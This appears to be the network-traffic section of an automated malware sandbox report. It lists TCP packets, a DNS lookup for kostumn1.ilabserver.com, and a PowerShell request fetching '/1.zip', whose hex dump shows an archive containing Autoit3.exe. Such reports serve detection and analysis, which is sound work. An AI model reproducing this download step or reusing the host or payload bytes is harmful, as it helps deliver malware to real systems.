                                    May 27, 2024 18:29:00.011449099 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.011497021 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.011538029 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.011543989 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.011569023 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.011585951 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.014349937 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.014390945 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.014425039 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.014431000 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.014455080 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.014472008 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.016375065 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.016419888 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.016450882 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.016458035 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.016486883 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.016495943 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.019340992 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.019393921 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.019422054 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.019428968 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.019460917 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.019483089 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.021336079 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.021377087 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.021404028 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.021411896 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.021435022 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.021456957 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.026819944 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.088454962 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.088525057 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.088579893 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.088592052 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.088620901 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.088654041 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.090759039 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.090806007 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.090837955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.090845108 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.093458891 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.093458891 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.097187042 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.097248077 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.097276926 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.097282887 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.097331047 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098345995 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098390102 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098412991 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098418951 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.098447084 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.098464966 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100083113 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100136042 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100166082 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100178957 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.100203037 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.100220919 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101818085 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101872921 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101900101 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101906061 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.101932049 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.101950884 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.102605104 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103694916 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103744030 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103769064 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103775024 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.103801012 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.103816986 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104826927 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104878902 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104887009 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104912996 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.104939938 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.104954004 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.116373062 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177377939 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177440882 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177448988 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177476883 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.177505016 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.177522898 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178531885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178596020 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178602934 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178627968 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.178654909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.178669930 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187443972 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187508106 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187510014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187540054 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.187565088 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.187577963 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188838959 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188908100 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188920975 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188941002 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.188966036 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.188981056 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190423965 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190494061 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190517902 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190550089 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.190579891 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.190587997 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.191971064 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192038059 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192049026 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.192070961 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.192099094 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.192111969 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193761110 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193809032 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193825960 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193835974 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.193861008 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.193881989 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194633007 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194679022 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194695950 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194704056 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.194730997 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.194744110 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.198606968 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265736103 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265810966 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265819073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265841961 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.265872955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.265887022 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.271348953 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277364969 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277415991 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277426958 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277446032 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277463913 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.277484894 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.277518034 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283552885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283613920 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283627033 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283646107 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.283675909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.283689976 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.284518003 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284569025 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284584045 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.284590960 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.284631014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285339117 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285393000 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285428047 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285434008 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.285443068 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.285466909 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286365986 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286397934 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.286442995 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.286464930 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286470890 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.286503077 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286511898 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287573099 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287612915 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287635088 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287641048 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287666082 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287681103 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.288914919 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.288958073 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.288975954 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.288984060 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.289011955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.289031982 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354314089 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354717970 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354779005 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354829073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354871035 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354908943 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354931116 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355881929 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355905056 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355948925 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355954885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355983019 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355992079 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371562004 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371624947 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371638060 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371654987 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371681929 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371699095 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373141050 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373184919 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373200893 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373209953 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373234987 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373255014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374095917 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374136925 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374162912 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374169111 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374191046 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374211073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374248028 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374385118 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374432087 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.397311926 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.546000957 CEST49730443192.168.2.4167.235.238.203

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 27, 2024 18:28:58.572530985 CEST6195953192.168.2.41.1.1.1
                                    May 27, 2024 18:28:58.627420902 CEST53619591.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    May 27, 2024 18:28:58.572530985 CEST192.168.2.41.1.1.10xcae2Standard query (0)kostumn1.ilabserver.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    May 27, 2024 18:28:58.627420902 CEST1.1.1.1192.168.2.40xcae2No error (0)kostumn1.ilabserver.com167.235.238.203A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • kostumn1.ilabserver.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730167.235.238.2034437276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-27 16:28:59 UTC173OUTGET /1.zip HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Host: kostumn1.ilabserver.com
                                    Connection: Keep-Alive
                                    2024-05-27 16:28:59 UTC276INHTTP/1.1 200 OK
                                    Date: Mon, 27 May 2024 16:28:59 GMT
                                    Server: Apache
                                    X-Content-Type-Options: nosniff
                                    Last-Modified: Mon, 27 May 2024 11:37:47 GMT
                                    ETag: "c0329-6196df2520363"
                                    Accept-Ranges: bytes
                                    Content-Length: 787241
                                    Connection: close
                                    Content-Type: application/zip
                                    2024-05-27 16:28:59 UTC16384INData Raw: 50 4b 03 04 14 00 00 00 08 00 fd 21 bb 58 e7 0e 09 76 c8 f3 06 00 a8 a2 0d 00 0b 00 00 00 41 75 74 6f 69 74 33 2e 65 78 65 ec fd 7d 7c 53 45 16 38 8c df 24 b7 6d 80 c0 8d 52 b0 4a d5 aa 55 51 d0 ad 06 b4 35 a0 29 6d da 22 2d a4 94 b6 20 b4 45 c5 5a 23 2a 42 42 8b f4 95 9b d0 5e 86 00 ee a2 e2 fb 0b ee ae bb cb ae a8 28 a0 88 2d 45 5a 04 79 13 15 04 04 15 f5 c6 54 2d 5a 4b 80 ca fd 9d 73 e6 26 2d b8 fb fd 3e cf e7 f3 fc f9 2b 4c ee dc b9 f3 3e 67 ce cb cc 99 33 79 77 ad 10 4c 82 20 88 e0 34 4d 10 36 08 fc cf 21 fc df ff 12 0c 82 30 e8 f2 77 07 09 eb fa 7d 7c c5 06 43 ee c7 57 4c a9 78 60 5e d2 9c b9 8f dc 3f f7 ee 87 92 ee bd fb e1 87 1f f1 24 dd 73 5f d2 5c ef c3 49 0f 3c 9c 94 39 a9 20 e9 a1 47 66 dd 77 e3 c0 81 fd 93 f5 3c 86 ce cb 5c 31 f9 c2 eb 5b 23
                                    Data Ascii: PK!XvAutoit3.exe}|SE8$mRJUQ5)m"- EZ#*BB^(-EZyT-ZKs&->+L>g3ywL 4M6!0w}|CWLx`^?$s_\I<9 Gfw<\1[#
                                    2024-05-27 16:28:59 UTC16384INData Raw: c9 3b a7 c1 bf c7 ea 0d de 23 f9 d7 40 ba 23 06 6c 70 36 6f f0 5d a2 c0 1b 1c 17 6d b0 6c 8c 34 f8 32 b3 d0 db e0 b9 71 d1 06 2f 95 f0 7c ca cc a5 26 3e 08 6e b3 5e 2d 9f cf 44 1a 5e ac ca aa d4 f0 ca 7d 29 52 16 59 16 c5 cb 0b dc 62 20 30 20 bf d3 67 42 38 88 8d c2 c1 2b be 08 1c 1c 82 36 f3 3c 5b b1 63 e6 99 59 2d 5a a2 bf 41 8f c8 7c bd b2 d7 e3 e0 2f 3a 67 ef 5c b5 be 48 24 5d 59 68 86 ce 16 82 f5 91 0e 44 b1 8f e7 fa b5 f1 fc 9a fe dd 70 5e 4d 33 8d bd 35 ad f1 53 4d 6f 8c d6 f4 0b 7f a4 a6 37 45 6b 3a f1 f7 3e 35 b5 c2 c4 fd f1 90 a6 15 a9 f2 0b e7 54 66 38 c6 b2 05 51 e3 20 87 38 aa 70 0f 09 28 f1 8f 91 80 22 3c e6 e0 a5 42 d6 2b 71 24 50 d7 ec cf 7e b2 1b e5 b9 14 32 2d fb 12 55 ce 50 3b 6e 19 64 df 57 bb 11 f0 de 38 f8 18 5c dd a3 37 f7 6c 6c 04
                                    Data Ascii: ;#@#lp6o]ml42q/|&>n^-D^})RYb 0 gB8+6<[cY-ZA|/:g\H$]YhDp^M35SMo7Ek:>5Tf8Q 8p("<B+q$P~2-UP;ndW8\7ll
                                    2024-05-27 16:28:59 UTC16384INData Raw: e8 e2 c1 de 37 62 f8 9d 69 72 47 aa 2e 0f 15 e3 8a 5c 09 21 9d 2a 91 ed 96 eb 50 1c 1a 57 c9 c5 21 a7 59 0d 3e 4a 77 6a 80 a0 e3 3c 80 72 8e f3 30 72 db ce 63 28 06 e5 1d 50 9c c7 49 08 72 aa f4 ad 83 be 75 a2 04 e4 ec d2 10 69 80 fc 73 01 ca 3f 18 d5 ac 0e 4b 27 4c f2 9a c1 7b 17 ab e9 09 38 55 17 4c 85 6d 95 5c c6 f9 66 3e 97 71 58 6b 65 16 b4 d3 45 9f fb a9 33 3c d8 59 57 16 f4 b6 f0 e8 a3 64 c4 f1 76 87 92 85 c6 95 54 5c ee 2c 2b 65 ad 51 d3 56 ed ea 9b 10 14 7a 4e 1f 93 43 6b a1 d5 ff a6 9b e9 78 93 dd 31 65 d8 9d 52 e3 2a 5e a4 50 79 35 8c ce af f9 bd 45 54 3f 7a 5e 27 4e 8f f4 a2 59 dd 31 0f 87 38 f4 31 75 63 05 66 a9 e4 75 a1 79 1c 23 cc f4 01 92 af 10 32 2d 28 76 43 41 db 9c 9a 01 0b 2a 9b 7f 03 1b 27 e2 3c aa b2 f4 97 7c f3 91 02 b7 37 95 68 6a
                                    Data Ascii: 7birG.\!*PW!Y>Jwj<r0rc(PIruis?K'L{8ULm\f>qXkeE3<YWdvT\,+eQVzNCkx1eR*^Py5ET?z^'NY181ucfuy#2-(vCA*'<|7hj
                                    2024-05-27 16:28:59 UTC16384INData Raw: 7b b7 44 c9 a7 15 e3 05 e8 54 80 f5 99 ab 54 8b 6e b7 ab d5 23 22 4d 4d 3e fb 2e dc f6 c1 15 ca 57 03 b8 4a 84 6a a5 76 a7 41 b4 7f 32 2d 64 5d 74 86 2f 8b 1c b5 a0 46 7c ee 8f ad b8 ff 14 2d a0 82 86 aa e5 5f d7 ef 6c 9c 6b 53 5e d0 5d b7 80 e6 72 27 ce 8a 6f 32 2a 3f 02 20 45 94 b6 1a 52 ae ed a6 c6 16 3d 7e 05 6e c1 42 97 aa 3a 52 71 9d 9d 23 e9 da ed 2a e0 76 18 8d dd 60 14 ae b6 82 21 0c 50 be 86 e3 b8 08 d7 71 53 ab 61 0c 71 99 84 65 cb 94 8b 97 a0 a9 fa ea 5f 16 f2 6d 18 73 fd 0a d3 fb 5b b1 5f 29 b6 81 75 0a ce 37 12 e8 3d 4d 16 c3 30 c8 31 5d 2e 80 1e 45 7d a0 58 29 84 9b e0 fa 9f 4e d6 a5 2c ac 0c fc e5 5f 16 0e db 6c b4 bc db a6 4e 3d c0 57 0e 3f 58 64 53 7e 72 1a d3 6e 20 c9 67 c3 55 80 45 a3 c2 e4 da 96 c1 a0 b7 48 09 a3 34 fe e0 f4 f5 8b 85
                                    Data Ascii: {DTTn#"MM>.WJjvA2-d]t/F|-_lkS^]r'o2*? ER=~nB:Rq#*v`!PqSaqe_ms[_)u7=M01].E}X)N,_lN=W?XdS~rn gUEH4
                                    2024-05-27 16:28:59 UTC16384INData Raw: 70 ee 53 08 bb 0c f0 eb 70 2e 15 64 25 fc fd 08 fe 52 e1 5a 06 c8 17 41 be 03 7f db 00 e3 3f 9d 2e 4c 6f 08 8f c0 76 57 30 8e 15 c6 51 57 82 ff c6 9b 04 61 c2 84 f1 e3 27 4c 98 38 51 9c 30 7e c2 44 b3 d9 64 32 9b 27 4d 9a 6c 36 99 27 09 37 fd 37 65 8a 4e 37 65 4a 64 e4 d4 29 ba 29 91 31 a3 fe 4d 9b 1e 45 01 6e b9 75 06 fc 13 a2 67 ce 9c 19 4d ff 04 fa a1 7f b3 66 cd 1a cd 35 1b 6b 32 54 65 f9 6b 48 d7 e2 26 95 ca cc 42 4b 70 f3 43 b2 d5 88 b9 75 41 3e bd c8 f5 e1 98 1d 2d f2 3b 67 7b a1 70 34 7f ae 37 1a c6 b9 d4 ad e2 f6 b1 90 ea ae ba 61 41 f4 3c 8d e5 20 3b 2c 54 3a 5c 8f 0f 0b 72 30 70 9c 7d e2 13 4b e4 e3 41 fc 72 2a 7d b4 53 fe ea b6 d9 d8 4a c8 a0 b2 6d 21 6b 15 b6 02 be 94 6d 0a 13 dd 8f 53 a5 cc 8e 15 8f 14 dc 21 fe b1 1d e0 ed fa f6 4b d9 46 b3
                                    Data Ascii: pSp.d%RZA?.LovW0QWa'L8Q0~Dd2'Ml6'77eN7eJd))1MEnugMf5k2TekH&BKpCuA>-;g{p47aA< ;,T:\r0p}KAr*}SJm!kmS!KF
                                    2024-05-27 16:28:59 UTC16384INData Raw: b2 b9 86 fa 2e a8 71 f9 7d 35 13 e5 fc de 86 5b e0 27 43 ca ef 0d 88 f8 e2 c8 0a 25 82 2c 87 93 18 c2 d0 70 4b c0 c4 ce 7f 41 cb 34 e5 d6 d0 be 0f b4 fe 11 7d ab 21 7c 02 2b 38 62 77 e8 5c cd 3a b7 cf 51 c0 4e 38 bf c4 a2 27 84 56 c7 84 84 ac 7b 4d 1d 19 d9 a2 ef 74 0d a8 49 c7 5c cd 86 df 0a 3a dd 36 87 22 67 0c 83 e6 3c 77 9f 23 f6 b7 90 7e 82 63 0a ee ce a5 3a c2 02 7f f7 66 e0 2e eb 86 f8 e6 16 6f c6 08 47 df 72 34 1c 42 58 8b 43 ee 4c b1 e8 a1 21 4f 9d 19 c6 26 aa e8 fe 29 1e 84 1c 9c 79 2b 78 e2 fd a5 30 e4 e0 04 1c dc c1 b1 67 ac b6 af aa 88 3f 23 39 87 03 7a 40 cc cf 69 41 07 a2 f5 ff f1 73 5a 36 98 aa 2c d6 e1 51 8e ce 52 c7 38 ee eb 34 83 af 13 72 75 02 53 a8 46 86 6a af 91 ed 7e 52 c9 17 bc 47 ae 28 4a ba 54 9c ea 34 8b 6e 7c e3 89 3c 1e 70 75
                                    Data Ascii: .q}5['C%,pKA4}!|+8bw\:QN8'V{MtI\:6"g<w#~c:f.oGr4BXCL!O&)y+x0g?#9z@iAsZ6,QR84ruSFj~RG(JT4n|<pu
